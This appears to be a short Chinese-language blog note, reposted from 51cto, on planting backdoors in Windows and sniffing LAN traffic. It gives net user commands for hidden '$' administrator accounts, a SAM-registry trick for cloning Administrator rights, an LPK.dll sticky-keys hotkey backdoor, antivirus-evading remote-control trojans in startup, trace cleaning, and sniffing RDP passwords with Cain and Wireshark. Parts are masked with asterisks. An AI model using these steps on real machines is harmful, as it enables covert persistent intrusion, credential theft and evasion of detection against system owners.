windows留后门与局域网抓包

嗅探3389密码
wireshark
cain

windows安装后门:
账号后门:
net user
net user 账号$ 密码 /add 加$符变为隐藏账号
net localgrop administrators 账号 /add
net user 账号 /del 删除账号

系统自带账号改密码  记录名字
regedit   打开注册表
HKEY_LOCAL_MACHINE->SAM->SAM
右键设置权限   刷新   users->name  找到账号  看类型   上面找到该账号
先找到管理员(administrator)账号  双击类型为REG_BINATY第一个  所有数据复制
粘贴进后门账号
关闭sam文件夹权限

LPK后门:
生成lpk.dll
键值为ascii码,2键同时按下2个键,3键同时按下三个键 生成
exe可执行程序触发
五次shift,同时按下设置的热键,弹出密码框,输入密码登录
×××后门:
远控上线+×××免杀,×××丢进开机启动项
部分带压力测试远控可进行DDOS×××
windows清理痕迹可下载清理工具
允许外连:
***工具:navicat premium essentials
不允许外连:
***脚本

信息搜集:
nmap
zenmap
scanport
ntscan
arp -a
net view 查看其它电脑主机名
查看ip:
ipconfig

getpass

流量监听:
wiresharke
cain
sniffer pass

猜你喜欢

转载自blog.51cto.com/3945465/2150134
今日推荐